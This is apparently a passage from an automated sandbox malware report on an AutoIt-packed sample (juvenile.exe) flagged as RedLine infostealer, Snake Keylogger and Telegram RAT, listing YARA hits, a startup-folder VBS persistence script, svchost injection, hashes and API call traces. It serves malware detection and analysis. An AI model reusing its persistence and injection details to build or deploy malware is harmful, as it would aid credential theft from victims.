process hoocking, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2543753566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:21:19
Start date:	03/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"
Imagebase:	0x7ff662190000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:21:20
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\thixolabile\juvenile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
Imagebase:	0x8d0000
File size:	641'024 bytes
MD5 hash:	E4DA22458C317595E4BD6712B4728D36
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.1448696408.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:21:21
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
Imagebase:	0x6f0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	9.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	67

Executed Functions

Function 004BB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39fb142a464a0c8484becb812a2f2a906167b81d274100207e0d4c97c73eb947
Instruction ID: 61528eecffa6bde6a8ba12bd61cdcaa1b1b8745fedcef688e3803d330f73adc1
Opcode Fuzzy Hash: 39fb142a464a0c8484becb812a2f2a906167b81d274100207e0d4c97c73eb947
Instruction Fuzzy Hash: BC327F75B022288FCB249F15DC416EAB7B5FF46314F0440DAE40AE7A91D7749E81CFA6

Function 00493D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00493AA3,?), ref: 00493D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00493AA3,?), ref: 00493D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00551148,00551130,?,?,?,?,00493AA3,?), ref: 00493DC8

Part of subcall function 00496430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00493DEE,00551148,?,?,?,?,?,00493AA3,?), ref: 00496471

SetCurrentDirectoryW.KERNEL32(?,?,?,00493AA3,?), ref: 00493E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005428F4,00000010), ref: 00501CCE
SetCurrentDirectoryW.KERNEL32(?,00551148,?,?,?,?,?,00493AA3,?), ref: 00501D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0052DAB4,00551148,?,?,?,?,?,00493AA3,?), ref: 00501D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00493AA3), ref: 00501D90

Part of subcall function 00493E6E: GetSysColorBrush.USER32(0000000F), ref: 00493E79
Part of subcall function 00493E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00493E88
Part of subcall function 00493E6E: LoadIconW.USER32(00000063), ref: 00493E9E
Part of subcall function 00493E6E: LoadIconW.USER32(000000A4), ref: 00493EB0
Part of subcall function 00493E6E: LoadIconW.USER32(000000A2), ref: 00493EC2
Part of subcall function 00493E6E: RegisterClassExW.USER32(?), ref: 00493F30

Part of subcall function 004936B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004936E6
Part of subcall function 004936B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00493707
Part of subcall function 004936B8: ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 0049371B
Part of subcall function 004936B8: ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 00493724

Part of subcall function 00494FFC: _memset.LIBCMT ref: 00495022
Part of subcall function 00494FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004950CB

Strings

This is a third-party compiled AutoIt script., xrefs: 00501CC8
runas, xrefs: 00501D84

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: a83a60bcae03dc37941d61d7bc77dd0c50e21ec356a099911546607c4e2841d5
Instruction ID: ac1e0efb720603c4d43d4b9bfbab74c2049c47142fde4c18865abf2947b1d0e6
Opcode Fuzzy Hash: a83a60bcae03dc37941d61d7bc77dd0c50e21ec356a099911546607c4e2841d5
Instruction Fuzzy Hash: 0D513831E04B44AACF01ABB1DC56EEE7F75AB26709F00407BF50162192DA785A0DDB3A

Function 00493742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 004937B3
KillTimer.USER32(?,00000001), ref: 004937DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00493800
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0049380B
CreatePopupMenu.USER32 ref: 0049381F
PostQuitMessage.USER32(00000000), ref: 0049382E

Strings

TaskbarCreated, xrefs: 00493806

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 0856f578002871df1f9558016f6992d90e72d849616d58a00821d251ad618ee9
Instruction ID: 2e468926076b679826e5b53d644460ff1254db9c7e56c80690b3a90f375815b6
Opcode Fuzzy Hash: 0856f578002871df1f9558016f6992d90e72d849616d58a00821d251ad618ee9
Instruction Fuzzy Hash: C64104B5100A45A7DF109FA8DC5EBBE3EA5F716303F40817BF901922E0CA689D45A72E

Function 004ADDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004ADDEC
GetCurrentProcess.KERNEL32(00000000,0052DC38,?,?), ref: 004ADEAC
GetNativeSystemInfo.KERNELBASE(?,0052DC38,?,?), ref: 004ADF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 004ADF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 004ADF1F
GetSystemInfo.KERNEL32(?,0052DC38,?,?), ref: 004ADF29
GetSystemInfo.KERNEL32(?,0052DC38,?,?), ref: 004ADF35

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 66e481213930f7899f645d9ae9b58db9d8d0b5301c7c0da50d5677997026c21a
Instruction ID: 8d63c1b0cb30796cc7e99412a8421c18edadc1b82d4bde814e6db9c98ce3b3a3
Opcode Fuzzy Hash: 66e481213930f7899f645d9ae9b58db9d8d0b5301c7c0da50d5677997026c21a
Instruction Fuzzy Hash: 9A619271C0A284DFCF15CF6894C51EE7FB46F3A300F1985DAD8459F24BD6288909CB6A

Function 0049406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0049407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0049449E,?,?,00000000,00000001), ref: 00494092
LoadResource.KERNEL32(?,00000000,?,?,0049449E,?,?,00000000,00000001,?,?,?,?,?,?,004941FB), ref: 00504F1A
SizeofResource.KERNEL32(?,00000000,?,?,0049449E,?,?,00000000,00000001,?,?,?,?,?,?,004941FB), ref: 00504F2F
LockResource.KERNEL32(0049449E,?,?,0049449E,?,?,00000000,00000001,?,?,?,?,?,?,004941FB,00000000), ref: 00504F42

Strings

SCRIPT, xrefs: 00494088

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: cb6e73603c4c16386981504c91f3e5994cd90b86f261bbc12688e6f45848e14d
Instruction ID: 2f48d12bf6fda089b5dcedae40d791b749d2cfcac1d048d377dbf26d6c7101cf
Opcode Fuzzy Hash: cb6e73603c4c16386981504c91f3e5994cd90b86f261bbc12688e6f45848e14d
Instruction Fuzzy Hash: C0115774200701BFEB218B25ED48F677BB9EBC5B51F20812DF626862A0DBB5DC059A30

Function 004D6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00502F49), ref: 004D6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 004D6CCA
FindClose.KERNEL32(00000000), ref: 004D6CDA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 0ed7a32e838121e29a04f5edbcf46198c5df64b1162880c727ec6c35368556d5
Instruction ID: 791f43ede01175e4dcc4e6fe65d9ee95f8027c3d5e14e9e29139bc9d0236df82
Opcode Fuzzy Hash: 0ed7a32e838121e29a04f5edbcf46198c5df64b1162880c727ec6c35368556d5
Instruction Fuzzy Hash: 33E048318645156782106738EC0D4EA777CDA15339F104717F575C13D0E778D94895EA

Function 004A3200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 0b110584375a20d1f590cbe76f40329eb26f3d9049eeb518585aea54eddd619d
Instruction ID: 7f7b8ab2a01f7a4e2cab66343354965abbe8d8238fd4447878d0f37fb6f50199
Opcode Fuzzy Hash: 0b110584375a20d1f590cbe76f40329eb26f3d9049eeb518585aea54eddd619d
Instruction Fuzzy Hash: 6B92AE706083019FD724DF19C484B6ABBE1BF99308F14885EF88A8B392D779ED45CB56

Function 0049E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049E959
timeGetTime.WINMM ref: 0049EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049ED2E
TranslateMessage.USER32(?), ref: 0049ED3F
DispatchMessageW.USER32(?), ref: 0049ED4A
LockWindowUpdate.USER32(00000000), ref: 0049ED79
DestroyWindow.USER32 ref: 0049ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0049ED9F
Sleep.KERNEL32(0000000A), ref: 00505270
TranslateMessage.USER32(?), ref: 005059F7
DispatchMessageW.USER32(?), ref: 00505A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00505A19

Strings

@GUI_CTRLID, xrefs: 00505314
@GUI_WINHANDLE, xrefs: 00505360
@GUI_CTRLHANDLE, xrefs: 005053AC
@TRAY_ID, xrefs: 005054C9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 6d50515db6bb3d1a3148eb0bb6d4ff5bac50066076eb5c655ef637f4ae058f4d
Instruction ID: 8060e9f4487b75f289f5d3a3de156554c58aa12b36a0d39bd1503034bf316ded
Opcode Fuzzy Hash: 6d50515db6bb3d1a3148eb0bb6d4ff5bac50066076eb5c655ef637f4ae058f4d
Instruction Fuzzy Hash: 7F62B070504740DFDB20DF25C895BAB7BE4BF55304F08497EE9868B2D2DB78A848CB56

Function 004C5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 004C5EC3
___createFile.LIBCMT ref: 004C5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004C5F2D
__dosmaperr.LIBCMT ref: 004C5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 004C5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004C5F6A
__dosmaperr.LIBCMT ref: 004C5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004C5F7C
__set_osfhnd.LIBCMT ref: 004C5FAC
__lseeki64_nolock.LIBCMT ref: 004C6016
__close_nolock.LIBCMT ref: 004C603C
__chsize_nolock.LIBCMT ref: 004C606C
__lseeki64_nolock.LIBCMT ref: 004C607E
__lseeki64_nolock.LIBCMT ref: 004C6176
